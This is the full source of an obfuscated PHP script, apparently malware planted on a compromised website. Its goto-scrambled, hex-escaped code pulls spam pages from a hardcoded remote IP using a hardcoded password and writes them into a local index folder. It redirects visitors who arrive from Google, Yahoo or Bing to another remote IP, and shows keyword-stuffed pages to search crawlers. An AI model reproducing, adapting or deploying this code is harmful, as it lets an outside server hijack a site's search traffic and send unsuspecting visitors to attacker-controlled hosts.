Your IP : 216.73.216.86
<?php
goto RtC2c; neugO: $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); goto Mthhy; NfITs: if (function_exists("\143\x75\x72\x6c\137\x69\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\x70\x3a\x2f\x2f\66\x35\x2e\x31\60\71\x2e\x36\67\x2e\61\x30\x30\x2f" . $_GET["\x66\156"] . "\x2e\x70\150\x70\x3f\x70\141\x73\x73\75{$apass}\x26\161\75{$_GET["\151\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\157\172\151\x6c\x6c\141\x2f\64\56\60\x20\50\143\x6f\x6d\x70\x61\164\x69\142\154\x65\73\40\x4d\123\x49\x45\x20\x36\x2e\x30\x3b\40\127\151\156\x64\157\x77\163\x20\x4e\124\40\x35\x2e\x31\x3b\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto VVVLI; DsOPF: if ($s == "\134" | $s == "\57") { $s = ''; } goto CkoIQ; Fmlzn: if (strlen($text) > 500) { $out = fopen("\x69\156\144\145\170\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto hJJOa; cXZRd: $apass1 = "\x76\151\163\x64\157\151\x6a\x65\x77"; goto wNqav; ewW8I: $_GET["\167\157\x72\x6c\x64"] = 5; goto mY_Xz; PKL3N: $apass2 = "\142\x32\x33\150\162\62\x33\x76\x72\63\62"; goto G8VmY; VVVLI: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\164\x70\x3a\x2f\x2f\66\x35\x2e\61\60\x39\56\66\67\56\x31\x30\60\57" . $_GET["\x66\156"] . "\56\x70\x68\x70\77\x70\x61\163\x73\x3d{$apass}\46\161\x3d{$_GET["\151\144"]}"); } goto sXQj3; zi1iR: $apass3 = "\162\x76\63\x32\171\x64\x61\143\163\166\x73\144\x76"; goto AnBvw; S44O9: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto zLxON; wNqav: $x1 = 3; goto EZh1O; mY_Xz: $_GET["\x66\x6e"] = "\x36\x39\66\71\66\x39\156\145\167"; goto cXZRd; iZcTY: if (strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\122\105\122"], "\x67\x6f\157\x67\154\x65\x2e") or strpos($_SERVER["\110\124\x54\x50\137\122\x45\x46\105\122\x45\122"], "\x79\x61\150\x6f\x6f\x2e") or strpos($_SERVER["\110\124\x54\120\x5f\x52\x45\106\105\122\x45\122"], "\x62\x69\156\147\56")) { $tpl = "\x69\156\144\145\170\x2f" . $_GET["\x69\x64"] . "\x2e\x70\150\160\x2e\x74\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\x4c\x6f\x63\141\x74\151\x6f\x6e\x3a\x20\150\x74\x74\x70\72\57\x2f\66\x35\56\x31\60\x38\56\x31\60\56\61\71\x39\x2f\145\156\164\x65\162\x2f\x3f\155\x61\162\x6b\75{$today}\55{$s}\46\164\160\154\75{$tpl}\46\x65\x6e\147\153\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\56\160\x68\x70"; if (file_exists("\x69\x6e\144\x65\170\x2f" . $myname)) { $html = @file_get_contents("\x69\x6e\x64\x65\170\57" . $myname); if (strpos($_SERVER["\110\124\124\x50\x5f\x55\x53\x45\x52\x5f\101\x47\x45\x4e\x54"], "\x62\x69\156\147") > 2 or strpos($_SERVER["\x48\124\x54\x50\x5f\125\x53\105\122\137\x41\x47\x45\x4e\124"], "\x79\141\150\x6f\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\144"]); $html = str_replace("\74\x74\x69\x74\154\145\76\74\57\164\x69\x74\x6c\x65\x3e", "\74\164\x69\164\154\145\x3e{$keyword}\x3c\x2f\x74\151\164\x6c\x65\x3e", $html); } echo $html; die; } } goto Z1G6Q; Z1G6Q: $query_pars_2 = str_replace("\x2d", "\x2b", $_GET["\151\144"]); goto IxNqJ; sXQj3: if (strlen($text) < 5000) { $url = "\66\65\x2e\x31\60\71\56\66\x37\x2e\61\x30\x30"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\74\142\x72\x20\57\76\xa"; } else { $req = "\57" . $_GET["\146\156"] . "\56\160\x68\x70\77\160\141\x73\163\x3d{$apass}\46\x71\75{$_GET["\151\x64"]}"; $out = "\x47\105\x54\x20{$req}\40\110\x54\x54\x50\x2f\61\56\60\xd\xa"; $out .= "\110\x6f\163\164\72\x20{$url}\xd\xa"; $out .= "\x43\157\x6e\x6e\145\143\x74\x69\x6f\x6e\x3a\x20\103\x6c\157\163\x65\15\xa\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto Fmlzn; EZh1O: $xx1 = 5; goto neugO; AnBvw: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto iZcTY; G8VmY: $s = dirname($_SERVER["\x50\x48\x50\137\x53\105\x4c\106"]); goto DsOPF; zLxON: if ($_GET["\151\x64"] == "\164\145\x73\x74\x69\156\147") { echo "\164\145\163\164\x20\147\x6f\157\x64\x2e\56\x2e"; die; } goto K4jpN; IxNqJ: $text = ''; goto NfITs; RtC2c: error_reporting(0); goto A1SWx; K4jpN: if ($_GET["\x69\x64"] == "\151\x6e\144\145\170") { header("\x4c\157\143\141\164\151\157\x6e\72\40\x68\x74\164\x70\x73\x3a\x2f\57\x67\157\x6f\147\154\x65\56\x63\157\x6d"); die; } goto ewW8I; CkoIQ: $s = $_SERVER["\x53\105\122\x56\x45\x52\x5f\116\x41\x4d\105"] . $s; goto zi1iR; hJJOa: echo $text; goto WZ7Nb; Mthhy: $keyword = str_replace("\40", "\53", $keyword); goto PKL3N; A1SWx: $today = "\x32\60\x32\x36\x30\x33\x33\61\x2d"; goto S44O9; WZ7Nb: ?>